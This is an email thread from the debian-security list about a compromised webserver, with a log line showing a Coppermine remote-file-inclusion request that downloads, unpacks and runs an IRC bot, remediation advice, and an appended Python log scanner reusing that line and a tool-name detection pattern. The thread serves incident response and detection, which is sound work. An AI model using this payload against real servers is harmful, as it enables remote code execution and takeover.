RE: Advice needed, trying to find the vulnerable code on Debian webserver.
Thanks for all your help.
The dodgy code has been removed and the server secured!
Thanks again!
--
Ross
-----Original Message-----
From: Steve Kemp [mailto:steve@steve.org.uk] On Behalf Of Steve Kemp
Sent: Saturday, 19 June 2004 11:24 AM
To: Ross Tsolakidis
Cc: debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian webserver.
On Sat, Jun 19, 2004 at 10:42:56AM +1000, Ross Tsolakidis wrote:
> Hi all,
>
> I did a search in the logs on some of the suspicious users and found a
> match.
> The files that are being downloaded then executed seem to be IRC bots.
> http://www.energymech.net/
>
> Here are some log files.
>
> 193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabela.net/a.txt?&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xzvf%20fast.tgz;cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
>
> All those executables in the /tmp dir seem to be all coming from that
> site on our box, definitely the culprit.
>
> Can someone explain what is going on here ?
> Cause it doesn't make any sense.
There seems to be some buggy PHP code being used on that site, which
is allowing the remote inclusion of content from the mirabella.net
site - this is being abused to run code upon your host.
You should immediately disable the coppermine PHPNuke module and
get it patched, upgraded, or replaced.
Going to securityfocus.com and searching the mailing lists for
coppermine pulls up multiple hits describing problems - for example
this post:
http://www.securityfocus.com/archive/1/361976
Notice the URLs on section E2? They match yours..
See this one for more details too:
http://www.securityfocus.com/archive/1/361976
Two things you can do immediately to stop this particular exploit
are run safe mode for PHP, and firewall off access to mirabella.net.
> What steps should I take now ?
Remove PHP Nuke, check the logs for other activity, make sure your
kernel is patched against local root via the recent holes, and
look at using a locked down PHP installation - I'm not sure how
PHPNuke will work with that, but it's gotta be worth a try.
Steve
--
# The Debian Security Audit Project.
http://www.debian.org/security/audit
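Steve's advice to "check the logs for other activity" can be scripted. The following is an added example for readers of this thread, not code from either poster or from the Debian Security Audit Project: it parses Apache combined-format access log lines and flags requests whose query parameters carry a remote URL (the remote-inclusion pattern seen above) or a URL-encoded shell command chain. The log regex, the field names and the benign second sample line are assumptions constructed for this example; the first sample line is the one quoted in the thread.

```python
import re
from urllib.parse import urlparse, unquote

# Apache "combined" log format. Field names are this example's own choice.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# A parameter value that is itself a URL is the classic remote-include indicator.
REMOTE_URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# Command separators plus a download/extract tool name: a shell chain smuggled in a parameter.
SHELL_CHAIN_RE = re.compile(r'[;&|`]|\$\(')
SHELL_TOOL_RE = re.compile(r'\b(wget|curl|tar|chmod|perl|sh)\b')

# Constructed sample input: line 1 is the request quoted in the thread,
# line 2 is a benign request to the same script (assumed for contrast).
SAMPLE_LOG = [
    '193.95.112.71 - - [18/Jun/2004:22:57:04 +1000] "GET '
    '/modules/coppermine/themes/default/theme.php?THEME_DIR=http://www.mirabela.net/a.txt?'
    '&cmd=cd%20/tmp/;wget%20www.corbeanu.as.ro/fast.tgz;tar%20xzvf%20fast.tgz;'
    'cd%20fastmech;mv%20fastmech%20httpd;./httpd HTTP/1.0" 200 6461 "-" '
    '"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"',
    '10.0.0.5 - - [18/Jun/2004:23:01:10 +1000] "GET '
    '/modules/coppermine/themes/default/theme.php?THEME_DIR=default HTTP/1.0" '
    '200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"',
]


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def analyse_request(target):
    """Return a list of findings for one request target (path + query string)."""
    findings = []
    query = urlparse(target).query
    # Split on '&' only: the attacker's ';' separators must stay inside one value.
    for pair in query.split('&'):
        if not pair:
            continue
        name, _, raw_value = pair.partition('=')
        value = unquote(raw_value)
        if REMOTE_URL_RE.match(value):
            findings.append(f"remote include: {name}={value}")
        if SHELL_CHAIN_RE.search(value) and SHELL_TOOL_RE.search(value):
            findings.append(f"shell command chain: {name}={value}")
    return findings


def scan_log(lines):
    """Return one record per line that produced at least one finding."""
    hits = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        findings = analyse_request(fields["target"])
        if findings:
            hits.append({"ip": fields["ip"], "ts": fields["ts"],
                         "target": fields["target"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]}')
        for f in hit["findings"]:
            print("   ", f)
```

Run it over the real access log by reading the file into `scan_log`; any line it flags deserves the same treatment Steve describes, and a hit on a parameter other than THEME_DIR points at a second vulnerable script.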